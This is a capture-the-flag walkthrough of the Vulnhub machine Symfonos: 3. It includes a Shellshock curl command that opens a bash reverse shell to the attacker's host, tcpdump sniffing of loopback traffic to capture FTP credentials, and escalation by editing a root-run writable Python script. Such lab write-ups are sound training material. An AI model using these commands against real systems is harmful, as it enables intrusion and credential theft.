# Symfonos: 3 - Walkthrough

### Machine Details

#### Name: Symfonos: 3
#### OS: Linux
#### Platform: [Vulnhub](https://www.vulnhub.com)
#### Download Link: [Symfonos 3](https://www.vulnhub.com/entry/symfonos-31,332/)

___

### Getting started

After obtaining an IP address for the machine, 192.168.50.137 in my case, I added it to my hosts file.

```
192.168.50.137 symfonos3.local
```

As always, I ran a quick nmap scan on the target and the following output was obtained.

![](https://i.imgur.com/PPZH9uL.png)

### Getting Trolled HARD

Visiting the web service on port 80, I got the page below.

![](https://i.imgur.com/Nn2mNhZ.png)

Checking the source code, there was a comment which I thought was interesting.

![](https://i.imgur.com/674VlR9.png)

I ran a directory search using dirb and found some pages.

![](https://i.imgur.com/MU6wRU1.png)

My mistake was that I only paid attention to the /gate directory, and I followed it down a deep rabbit hole xD.

![](https://i.imgur.com/wuu09NC.png)

### Getting Foothold

Going back to the directory scan, there is a `cgi-bin` directory. I ran another scan on this directory and found `underworld`.

![](https://i.imgur.com/MSujbI5.png)

`cgi-bin` has a couple of exploit techniques which you can read more about [here](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). To obtain a shell, I used Shellshock.

```
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.50.128/9001 0>&1' http://symfonos3.local/cgi-bin/underworld
```

> To quickly test if an endpoint is vulnerable to Shellshock, I found [Shellshocker](https://github.com/erinzm/shellshocker) useful.

Now I have a reverse shell as the `cerberus` user.

![](https://i.imgur.com/nXiqIGo.png)

### Privilege Escalation

Checking the id of the user I have a shell as, I noticed this user belongs to the pcap group, which means this user can read network traffic.

![](https://i.imgur.com/tyxAiro.png)

Using the command below, I was able to sniff network traffic.

```
tcpdump -i lo -w file.pcap
```

After leaving it to run for some time, I exited it and opened the `file.pcap` file using the command below.

```
tcpdump -r file.pcap
```

![](https://i.imgur.com/XhFISG7.png)

Going through the traffic, I saw FTP login requests containing user `hades` credentials.

### User Hades

I logged in as hades via SSH. Following a similar procedure, I checked the id and noticed that this user belongs to a group called `gods`. I ran a find to see which files belong to this group and I got two Python files which are writeable.

```
find / -type f -group gods -ls 2>/dev/null
```

![](https://i.imgur.com/BZgaYjF.png)

### Road to ROOT!

Since the file is writeable, I edited it to contain code to return a reverse shell to me and after some minutes, I got a connection as the root user.

![](https://i.imgur.com/HLPb519.png)

![](https://i.imgur.com/s07E1aT.png)

And that's SYMFONOS: 3. Hope you enjoyed reading. See you at the next one.

###### tags: `symfonos` `vulnhub` `cgi-bin` `shellshocker` `pcap` `tcpdump`